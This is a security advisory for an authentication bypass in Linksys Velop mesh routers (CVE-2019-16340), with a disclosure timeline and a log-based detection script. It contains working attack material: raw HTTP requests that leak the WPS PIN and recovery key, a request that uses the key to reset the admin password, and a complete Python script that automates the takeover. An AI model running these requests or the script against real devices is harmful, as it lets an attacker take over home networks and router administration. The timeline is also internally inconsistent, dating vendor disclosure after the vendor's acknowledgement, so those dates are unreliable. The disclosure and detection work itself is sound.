Advisories

Linksys Velop Authentication Bypass

CVE ID

CVE-2019-16340

Tested Versions

  • Linksys Velop 1.1.2.185309

Product URL(s)

  • https://www.linksys.com/us/velop/

Velop is the Whole Home Mesh Wi-Fi system from Linksys: a modular mesh made up of one or more nodes that together provide Wi-Fi coverage across a home.

Linksys sells it in three SKUs: WHW0303, WHW0302 and WHW0301.

They differ only in pack size (3, 2 and 1 nodes respectively); the system itself is the same.

Vulnerability

The firmware has several information-leak problems. The one documented here is /sysinfo_json.cgi: the node's web server (lighttpd, per the Server header below) answers a GET for this URL without any authentication, and the response contains secrets that can be turned into an authentication bypass.

The following proof-of-concept request, which carries no X-JNAP-Authorization header or any other credential, returns the data:

GET /sysinfo_json.cgi HTTP/1.1
Host: 10.158.1.1
Accept: application/json; charset=UTF-8
Expires: Fri, 10 Oct 2015 14:19:41 GMT
Accept-Encoding: gzip, deflate
Accept-Language: zh-Hans-CN;q=1, en-CN;q=0.9
Cache-Control: no-cache
Content-Type: application/json; charset=UTF-8
User-Agent: Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)
Connection: close

Response:

HTTP/1.1 200 OK
Connection: close
CONTENT-LANGUAGE: en
Date: Thu, 11 Oct 2012 11:09:15 GMT
Server: lighttpd/1.4.39
Content-Length: 94710

siSections="MfgData,BootData,Syscfg,Sysevent,Messages,Dmesg,Ps,MemoryInfo,CpuInfo,WifiBasicInfo,WifiRadioInfo,WifiClientInfo,WifiPoorClientInfo,WifiLegacyClientInfo,WifiAllAPInfo,WifiSameAPInfo,WifiAllCAInfo,WifiMyCAInfo,IPInfo,PingInfo,Conntrack,ConntrackTotals,ConntrackAvg,Thrulay";
var MfgData = {
 "title": "Manufacturer Data",
 "description": "This is used to manufacturer unit and in SKU API",
 "timestamp": "16:01:02.12/31/69",
 "data": [
{
.......
 "wps_pin": "wps_device_pin = 58163597",
.......
"device_recovery_key": "84667",
.......
 }
 ]
};
......

The two most valuable values are the WPS PIN and the device recovery key. If WPS is enabled, the WPS PIN is enough to join the Wi-Fi network even after the Wi-Fi password has been changed. The recovery key is the reset code that the setup flow accepts for resetting the admin password, so an attacker can send the following JNAP request, again without any X-JNAP-Authorization header, to set a new admin password:

POST /JNAP/ HTTP/1.1
Host: 192.168.1.1
Accept: application/json; charset=UTF-8
Expires: Fri, 10 Oct 2015 14:19:41 GMT
Accept-Encoding: gzip, deflate
Accept-Language: zh-Hans-CN;q=1, en-CN;q=0.9
Cache-Control: no-cache
Content-Type: application/json; charset=UTF-8
Content-Length: 48
User-Agent: Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)
Connection: close
X-JNAP-Action: http://linksys.com/jnap/nodes/setup/SetAdminPassword

{"resetCode":"84667","adminPassword":"test1234"}

The node accepts the request and the administration password becomes test1234; the attacker can then log in as admin.
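The chain above, reconstructed as an added example; this is not code from the original advisory or from Linksys. It parses the JavaScript-style /sysinfo_json.cgi body for wps_pin and device_recovery_key, checks that the leaked PIN is a real WPS PIN via the standard WPS PIN checksum, builds the JNAP SetAdminPassword request (the body it produces is byte-for-byte the one in the advisory, 48 bytes), and classifies a probe response as still leaking or fixed. The sample body is constructed from the fragment quoted above; the target host, the new password and all function names are assumptions.

```python
"""Added example, not code from the original advisory or from Linksys.

Reconstructs the two-step chain described above against one Velop node:
  1. unauthenticated GET /sysinfo_json.cgi, parse wps_pin and
     device_recovery_key out of the JavaScript-style body;
  2. POST /JNAP/ with X-JNAP-Action SetAdminPassword, using the leaked
     recovery key as resetCode.
SAMPLE_SYSINFO is constructed from the fragment quoted in the advisory; the
target host, the new password and the function names are assumptions.
"""
import http.client
import json
import re

SAMPLE_SYSINFO = r'''siSections="MfgData,BootData,Syscfg";
var MfgData = {
 "title": "Manufacturer Data",
 "data": [
{
 "wps_pin": "wps_device_pin = 58163597",
 "device_recovery_key": "84667",
 }
 ]
};
'''

# The body is JavaScript (var assignments, trailing commas), not JSON, so
# json.loads() rejects it; targeted regexes cope with that and with the
# "wps_device_pin = NNNNNNNN" packing of the PIN value.
WPS_PIN_RE = re.compile(r'"wps_pin"\s*:\s*"[^"]*?(\d{8})"')
RECOVERY_KEY_RE = re.compile(r'"device_recovery_key"\s*:\s*"(\d+)"')

SET_ADMIN_PASSWORD = "http://linksys.com/jnap/nodes/setup/SetAdminPassword"


def parse_sysinfo(body: str) -> dict:
    """Return {'wps_pin': ..., 'device_recovery_key': ...} for the keys found."""
    found = {}
    m = WPS_PIN_RE.search(body)
    if m:
        found["wps_pin"] = m.group(1)
    m = RECOVERY_KEY_RE.search(body)
    if m:
        found["device_recovery_key"] = m.group(1)
    return found


def wps_pin_checksum_ok(pin: str) -> bool:
    """WPS PINs carry a checksum in the 8th digit: 3 * digits in positions
    1,3,5,7 plus digits in positions 2,4,6, then (10 - sum % 10) % 10.
    A leaked value that passes is a genuine PIN, not a placeholder."""
    if not re.fullmatch(r"\d{8}", pin):
        return False
    d = [int(c) for c in pin]
    total = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - total % 10) % 10 == d[7]


def build_set_admin_password(reset_code: str, new_password: str):
    """Headers and body for the JNAP SetAdminPassword action. No
    X-JNAP-Authorization header is sent: the resetCode is the credential."""
    body = json.dumps({"resetCode": reset_code, "adminPassword": new_password},
                      separators=(",", ":")).encode()
    headers = {
        "Content-Type": "application/json; charset=UTF-8",
        "Content-Length": str(len(body)),
        "X-JNAP-Action": SET_ADMIN_PASSWORD,
    }
    return headers, body


def classify_probe(status: int, body: str) -> str:
    """'leaking' if the CGI still answers 200 with the secrets, 'fixed' if it
    now refuses unauthenticated callers or is gone, 'unknown' otherwise."""
    if status == 200 and RECOVERY_KEY_RE.search(body):
        return "leaking"
    if status in (401, 403, 404):
        return "fixed"
    return "unknown"


def http_exchange(host: str, method: str, path: str, headers=None, body=None):
    """One plain HTTP round trip to the node; returns (status, body_text)."""
    conn = http.client.HTTPConnection(host, 80, timeout=5)
    conn.request(method, path, body=body, headers=headers or {})
    resp = conn.getresponse()
    text = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, text


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "10.158.1.1"  # assumed target
    status, body = http_exchange(host, "GET", "/sysinfo_json.cgi")
    verdict = classify_probe(status, body)
    print(f"{host}: {verdict}")
    if verdict == "leaking":
        secrets = parse_sysinfo(body)
        print("secrets:", secrets, "pin checksum ok:",
              wps_pin_checksum_ok(secrets.get("wps_pin", "")))
        if "device_recovery_key" in secrets and len(sys.argv) > 2:
            # The password is only changed when a new one is given on the CLI.
            hdrs, data = build_set_admin_password(secrets["device_recovery_key"], sys.argv[2])
            print(http_exchange(host, "POST", "/JNAP/", hdrs, data))
```

Run as `python3 velop_poc.py 10.158.1.1` to probe only, or add a second argument to perform the reset. The checksum check is worth keeping in any triage script: the PIN quoted in the advisory (58163597) passes it, which confirms the leaked field is a usable WPS credential rather than a default or test value.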

The root cause is that the node serves two interfaces from the same web server: the JNAP endpoint at /JNAP/, which checks the X-JNAP-Authorization header, and CGI scripts such as /sysinfo_json.cgi, which can be fetched with a plain crafted HTTP request. The server applies no authorization check to the CGI resource, and that is what leaks the secrets.

A properly authenticated JNAP request carries an X-JNAP-Authorization header (HTTP Basic; the value below decodes to admin:admin), as in this example:

POST /JNAP/ HTTP/1.1
Host: 10.158.1.1
Accept: application/json; charset=UTF-8
Expires: Fri, 10 Oct 2015 14:19:41 GMT
X-JNAP-Authorization: Basic YWRtaW46YWRtaW4=
Accept-Encoding: gzip, deflate
Accept-Language: zh-Hans-CN;q=1, en-CN;q=0.9
Cache-Control: no-cache
Content-Type: application/json; charset=UTF-8
Content-Length: 178
User-Agent: Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)
Connection: close
X-JNAP-Action: http://linksys.com/jnap/core/Transaction

[{"request":{"sinceRevision":0},"action":"http:\/\/linksys.com\/jnap\/devicelist\/GetDevices3"},{"request":{},"action":"http:\/\/linksys.com\/jnap\/router\/GetDHCPClientLeases"}]

We recommend that end users install the fixed firmware (see the vendor support article in the timeline) and, until then, block all requests to /sysinfo_json.cgi. On the device side, the CGI resource should be subject to the same check as /JNAP/: reject any request that does not carry a valid X-JNAP-Authorization header.
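For anyone who can see the node's HTTP traffic (a proxy, an IDS, or the server's own access log), a detection pass for the recommendation above, as an added example that is not part of the original advisory. It parses lines in lighttpd's default accesslog format (%h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"), reports every hit on /sysinfo_json.cgi, and raises an alert only when a successful hit is followed within a window by a POST to /JNAP/ from the same client. The log lines, client addresses, timestamps and the five-minute window are constructed for this example. Caveat a practitioner should keep in mind: access logs do not record X-JNAP-Action or X-JNAP-Authorization, so a POST to /JNAP/ on its own is ordinary app traffic and must not be alerted on.

```python
"""Added example, not from the original advisory: detection over constructed
web-server access-log lines for the /sysinfo_json.cgi leak and the
leak-then-SetAdminPassword chain. Log format, addresses and the window are
assumptions."""
import re
from datetime import datetime, timedelta

# Constructed sample log (lighttpd default accesslog.format).
SAMPLE_LOG = """\
10.158.1.23 10.158.1.1 - [22/Feb/2019:10:00:01 +0800] "GET /sysinfo_json.cgi HTTP/1.1" 200 94710 "-" "Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)"
10.158.1.23 10.158.1.1 - [22/Feb/2019:10:00:09 +0800] "POST /JNAP/ HTTP/1.1" 200 63 "-" "Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)"
10.158.1.40 10.158.1.1 - [22/Feb/2019:10:02:00 +0800] "POST /JNAP/ HTTP/1.1" 200 1210 "-" "Linksys/2.5.2 (iPhone; iOS 11.2.6; Scale/3.00)"
10.158.1.23 10.158.1.1 - [22/Feb/2019:10:30:00 +0800] "GET /sysinfo_json.cgi HTTP/1.1" 403 345 "-" "curl/7.64.0"
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')


def parse_line(line: str):
    """One access-log line -> dict, or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "client": m["client"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # drop any query string
        "status": int(m["status"]),
    }


def sysinfo_hits(log_text: str):
    """Every request for /sysinfo_json.cgi. Status 200 means the secrets left
    the box; anything else means the node refused (e.g. after the fix)."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["path"] == "/sysinfo_json.cgi":
            outcome = "leaked" if ev["status"] == 200 else "refused"
            hits.append((ev["client"], ev["status"], outcome))
    return hits


def find_chains(log_text: str, window: timedelta = timedelta(minutes=5)):
    """Clients that fetched /sysinfo_json.cgi successfully and then POSTed to
    /JNAP/ within the window: the leak-then-password-reset pattern. A POST
    to /JNAP/ with no preceding leak from that client is not reported."""
    last_leak = {}
    chains = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if not ev:
            continue
        if ev["path"] == "/sysinfo_json.cgi" and ev["status"] == 200:
            last_leak[ev["client"]] = ev["ts"]
        elif ev["method"] == "POST" and ev["path"] == "/JNAP/":
            t0 = last_leak.get(ev["client"])
            if t0 is not None and ev["ts"] - t0 <= window:
                chains.append({"client": ev["client"], "leak_at": t0,
                               "jnap_at": ev["ts"]})
    return chains


if __name__ == "__main__":
    for hit in sysinfo_hits(SAMPLE_LOG):
        print("sysinfo_json.cgi hit:", hit)
    for chain in find_chains(SAMPLE_LOG):
        print("ALERT leak -> /JNAP/ POST chain:", chain)
```

On the sample log this reports two hits on the CGI (one 200 from 10.158.1.23 and one 403 after the fix) and a single chain alert for 10.158.1.23; the POST from 10.158.1.40 is left alone because that client never fetched the CGI.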

Timeline

  • 2019-06-22 Vendor disclosure
  • 2019-02-26 Vendor acknowledged the problem and reproduced it
  • 2019-05-31 We asked vendor if there are any updates. No response
  • 2019-06-06 We asked vendor if there are any updates
  • 2019-06-06 Vendor replied "Apologies for the delay in response; the engineering team informs me that a firmware release for Velop will be released later this month. Would you like a preview of this firmware to confirm our fix?"
  • 2019-06-06 We replied No
  • 2019-07-26 Vendor replied "We are starting a limited rollout of the release starting tonight and if all goes well, the full release will be opened up in the first week of August. Thank you!"
  • 2019-08-21 We asked vendor if there are any updates
  • 2019-08-23 Vendor replied: "We have finally released a fix to address this issue. https://www.linksys.com/us/support-article?articleNum=207568. We have not applied for a CVE and do not have any plans to do so. Thank you!"
  • 2019-08-26 We asked if we could apply a CVE for this issue
  • 2019-08-27 Vendor replied: "We have no objections if you'd like to file for a CVE."

Credit

Discovered by Puzzorsj